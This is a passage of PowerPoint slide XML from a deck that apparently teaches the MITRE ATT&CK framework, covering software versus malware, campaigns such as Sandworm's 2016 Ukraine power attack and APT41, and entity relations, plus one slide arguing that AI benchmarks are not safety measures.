              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Different from IOCs like domains or IP addresses; it's directly tied to attacker behavior.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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Inter"/>
              </a:rPr>
              <a:t>Key Points:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Always linked to specific techniques, groups, or campaigns.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Includes commercial, open source, built-in, and publicly available tools (e.g., PowerShell).</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Malware can be custom-made, closed source, or open source but is always designed for malicious purposes.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1154357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73172D7-E5CB-66FB-8544-947DD8FF74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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63143B86-023C-8BBC-CC28-36C157B1EE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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-68972" y="-187568"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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C7A2F7DB-E1B3-E741-79CA-5665A1D9EA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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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BENCHMARKS ≠ SAFETY: The AI Misconception</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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B935C78-D7CC-234D-1B32-6C707110AFA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1700661"/>
            <a:ext cx="9486899" cy="38533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IN" sz="2000" b="1" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>📊 Benchmarks Measure</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Task performance (e.g., physics Qs: ‘Ball acceleration = 9.8 m/s²’).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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IN" sz="2000" b="1" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>🛑 Safety Measures</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Harmful content, bias, misuse, data leaks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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IN" sz="2000" b="1" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>⚠️ Critical Gap</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>High scores ≠ ethical, secure, or safe AI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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IN" sz="2000" b="1" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>🔍 Beyond Benchmarks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Security frameworks, red teaming, ethics reviews.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B29D14A-2CF6-1E18-0CA7-E02464FF179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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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81567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38E893-F859-8428-BF20-6FF378F3EC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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FC80218-AB70-8857-5E93-C93FBCFFD68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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-166319"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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BB96EA14-C6FA-2939-DFF6-D90DD98DB6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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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ATT&amp;CK Campaigns</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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479534D-CA1F-149F-9914-63001B893FD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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="72813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7510592-C29F-C24A-9842-AE991076A617}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838197" y="1363134"/>
            <a:ext cx="10608735" cy="43150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l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Inter"/>
              </a:rPr>
              <a:t>What are campaigns?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>A campaign is a series of related attacks carried out over a set period, targeting multiple entities with a shared goal.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Not every major breach qualifies as a campaign; campaigns typically involve multiple targets or occur over a defined timeframe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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Inter"/>
              </a:rPr>
              <a:t>Key Points:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Campaigns are carefully planned, rather than one-off incidents.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2550705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141AFA-4710-D7C8-3A3B-5174598222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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3EB581E-138F-697A-6A6F-8BD5B007FF7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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-166319"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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22767271-70F3-B581-E71C-61F7199F2F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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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ATT&amp;CK Campaigns – Example 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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B2F169B-2C36-511B-E00A-5B2A60AA8E31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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941687" y="6129866"/>
            <a:ext cx="1761829" cy="72813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4A19E5A-680A-457B-EAC2-EDACE544826F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742752" y="1363134"/>
            <a:ext cx="10608735" cy="37379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Inter"/>
              </a:rPr>
              <a:t>2016 Ukraine Electric Power Attack (Campaign ID 25)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Conducted by the Sandworm group.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>What Happened?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Disrupted power distribution substations in Ukraine.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Second major public attack on Ukraine by Sandworm.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Significance </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Targeted critical infrastructure.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Demonstrated sophisticated planning and execution.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2336FEA-B95C-8B9C-1C19-29AE81ACB01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42900" y="5319852"/>
            <a:ext cx="11506200" cy="8326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1681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C0689CB-FEA1-6810-6E0D-057A6ED9FF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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D147D02D-C2FE-EC05-D542-65991145CA1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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-166319"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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2072B231-3C76-2C53-5226-306CA1A1D5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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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ATT&amp;CK Campaigns – Example 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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975A320-20B3-A012-4C3B-CC961D7A0A9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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941687" y="6129866"/>
            <a:ext cx="1761829" cy="72813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8E616CF-1E61-1AB2-3C84-F832CE3F840B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742752" y="1322666"/>
            <a:ext cx="10608735" cy="37379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Inter"/>
              </a:rPr>
              <a:t>APT41 &amp; UNST (2020 to Mid-2021)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Scope &amp; Targets:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Attacks across Europe, Asia, and the Middle East.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Focused on shipping, logistics, and media for information gathering.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Methods Used:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Reused known malware (e.g., previously observed tools).</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Introduced new tools, showcasing adaptability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Illustrates how campaigns evolve, combining old and new techniques to stay effective.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4559C7B-2592-8DFC-81D1-8CAF7D0F3B7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603" y="5312876"/>
            <a:ext cx="11215032" cy="816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1985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158B7B-5CAC-AAC2-7B69-A67FA2F70E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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76F87DF3-C1E6-9657-5A28-E375F55884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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-166319"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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F67C913E-D8A2-F381-0070-A309F9281D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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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ATT&amp;CK Relations</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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435C137-4426-5DA6-992D-402C2AFE68E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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941687" y="6129866"/>
            <a:ext cx="1761829" cy="728134"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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A9CC94E7-5C69-3754-5F55-8FA6DA2084E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="800292" y="1865009"/>
            <a:ext cx="1914331" cy="1029228"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="50800" dir="5400000" sx="1000" sy="1000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000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Groups</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/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8A051CC2-AC7A-5D72-47FA-9D5F8B52948D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3543493" y="1865009"/>
            <a:ext cx="1914331" cy="1029228"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="50800" dir="5400000" sx="1000" sy="1000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000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Tactics</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/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C584C901-65BD-92D4-06AE-E24D00F3D3F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3543493" y="3541409"/>
            <a:ext cx="1914331" cy="1029228"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="50800" dir="5400000" sx="1000" sy="1000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000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Techniques + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Subtechniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/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9EB08191-C600-B164-5802-676D50EE0CD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3543493" y="5217809"/>
            <a:ext cx="1914331" cy="1029228"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="50800" dir="5400000" sx="1000" sy="1000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000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Detections</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/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DA2D88EE-8364-80B3-1E4E-29144209B659}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="800292" y="3541409"/>
            <a:ext cx="1914331" cy="1029228"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="50800" dir="5400000" sx="1000" sy="1000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000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err="1"/>
              <a:t>Softwares</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/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43BA03DA-0BB0-F285-A4BB-700EA52AE5F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838197" y="5222037"/>
            <a:ext cx="1914331" cy="1029228"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="50800" dir="5400000" sx="1000" sy="1000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000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Data sources</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/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84DEAED3-B5D4-5CE9-AE8E-C68E5BAB5F33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6699051" y="2703209"/>
            <a:ext cx="1914331" cy="1029228"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="50800" dir="5400000" sx="1000" sy="1000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000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Campaigns</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Right Brace 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{541C436F-932A-0EA1-9A23-F4914B8A45F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5698067" y="1919525"/>
            <a:ext cx="512428" cy="2596596"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace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IN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p: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B7753CC7-FAED-82FF-00D4-F497A6B5C56F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="13" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2752528" y="5731933"/>
            <a:ext cx="790965" cy="0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CB2CA364-B994-C5A4-92DD-17899DA1CBFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="14" idx="0"/>
          </p:cNvCxnSpPr>
